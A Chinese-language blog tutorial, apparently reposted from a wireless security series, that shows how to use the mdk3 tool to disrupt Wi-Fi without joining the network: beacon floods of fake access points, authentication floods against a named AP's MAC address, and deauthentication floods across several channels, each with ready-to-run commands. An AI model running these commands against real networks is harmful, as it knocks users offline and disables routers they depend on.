無線安全專題_攻擊篇--干擾通信


  中秋節玩的比較嗨,無線安全專題的文章就拖沓了一下,見諒見諒。。。上篇講解了無線安全專題_破解篇03--打造個人字典有感興趣的朋友給我私信,還有在公眾號中給我留言說,希望我講解一下彩虹表和GPU破解的事情,所以我為了響應大家的需求,我之后會在破解篇中再增加一篇專門講解彩虹表和GPU破解的問題。今天咱們就開啟無線安全專題下一篇:攻擊篇。攻擊篇主要分為兩個部分:一個是不連接上無線下的攻擊,一個是連接上無線下的攻擊。本次講解的就是如何在不連接無線的情況下進行攻擊(僅僅是討論技術,切不要進行惡意使用),主要使用的工具是kali下面的mdk3。(我的新書《Python爬蟲開發與項目實戰》出版了,大家可以看一下樣章

  

  一.偽造大量的死亡AP信號,干擾通信

  首先咱們將無線網卡切換到監聽模式(怎么切換的,請看我之前寫的文章),偽造大量的AP信號使用的是mdk3的b參數。

  • b - Beacon Flood Mode
  • Sends beacon frames to show fake APs at clients.
  • This can sometimes crash network scanners and even drivers!
  • OPTIONS:
  • -n <ssid>    Use SSID <ssid> instead of randomly generated ones 給AP信號指定名稱,不使用就隨機生成
  • -f <filename>  Read SSIDs from file 可以從文件中讀取AP名稱
  • -v <filename>  Read MACs and SSIDs from file. See example file!  可以從文件中讀取ap mac和名稱
  • -d  Show station as Ad-Hoc  自定義為Ad-Hoc模式
  • -w  Set WEP bit (Generates encrypted networks) 自定義為wep加密
  • -g  Show station as 54 Mbit 自定義為54M模式
  • -t  Show station using WPA TKIP encryption 自定義為wpa TKIP 加密
  • -a  Show station using WPA AES encryption 自定義為wpa AES 加密
  • -m  Use valid accesspoint MAC from OUI database  讀取數據庫中的mac
  • -h  Hop to channel where AP is spoofed。This makes the test more effective against some devices/drivers。But it reduces packet rate due to channel hopping.
  • -c <chan>   Fake an AP on channel <chan>. If you want your card to hop onl, this channel, you have to set -h option, too! 自定義信道
  • -s <pps>  Set speed in packets per second (Default: 50) 自定義發包速率

 

    1.1 偽造一個名稱為為qiye1,信道為1,發包速率為200的AP信號

  •     mdk3 wlan1 b -n qiye1 -c 1 -p 200

 

 

    1.2 偽造一個名稱為為qiye1,信道為1,發包速率為200,加密方式為wpa AES的AP信號

  •     mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a

    從手機上可以看到qiye1這個信號是加密的。

  

   1.3 根據文件中的名稱偽造AP信號,信道為2。

  •     mdk3 wlan1 b -f FakeAPName.txt -c 2

    執行完成后,在電腦上可以看到下圖的效果,顯示了我自定義文件中的AP名稱:

   1.4 隨機偽造大量ap信號,信道為1

  •     mdk3 wlan1 b -g -c 1 

    電腦上會顯示各種亂七八糟命名的無線信號,填滿整個無線列表。

 

  二.驗證洪水攻擊方式,干擾通信,甚至可以干掉無線路由。

  mdk3自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙於處理過多的請求而停止對正常連接客戶端的響應,這個可以用來強迫用戶重啟路由。

  • a - Authentication DoS mode
  • Sends authentication frames to all APs found in range.
  • Too much clients freeze or reset almost every AP.
  • OPTIONS:
  • -a <ap_mac>  Only test the specified AP  攻擊目標AP的mac,可以看之前的欺騙篇,可以知道怎么回去ap  mac
  • -m  Use valid client MAC from OUI database 使用數據庫中mac
  • -c  Do NOT check for test being successful 不檢測測試是否成功
  • -i <ap_mac>  Perform intelligent test on AP (-a and -c will be ignored) 智能測試
  • This test connects clients to the AP and reinjects sniffed data to keep them alive
  • -s <pps>  Set speed in packets per second (Default: unlimited) 發包速率

   攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP。

  •     mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c  -s 300

 

 

 

  發起攻擊后,一直處於連接狀態,直到超時。手機也是這種情況,點擊連接后沒有什么反應。

 

  三.強制解除驗證洪水攻擊方式。

  在這種模式下,軟件會想周圍所有的AP發送強制解除驗證數據包,迫使所有連接上AP的客戶端掉線,無響應。

  • d - Deauthentication / Disassociation Amok Mode
  • Kicks everybody found from AP
  • OPTIONS:
  • -w <filename>  Read file containing MACs not to care about (Whitelist mode) 指定白名單mac
  • -b <filename>  Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名單
  • -s <pps>  Set speed in packets per second (Default: unlimited) 發包速率
  • -c [chan,chan,chan,...]  Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道,可以用逗號分隔多個信道

 

    3.1 攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP,使我客戶端掉線無法上網。

  •     mdk3 wlan1 d -b blacklist.txt 

    

      電腦掉線之后重新連接,發現已經連不上了。

 

     3.2 直接按照信道進行全范圍攻擊

    直接將我掃描到的所有信道進行攻擊。

  •     mdk3 wlan1 d  -c 6,11,4,3,13,7

    

 

   今天的分享就到這里,下一篇繼續分析。如果大家覺得還可以呀,記得推薦呦。



歡迎大家支持我公眾號: 


本文章屬於原創作品,歡迎大家轉載分享。尊重原創,轉載請注明來自:七夜的故事 http://www.cnblogs.com/qiyeboy/
 
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM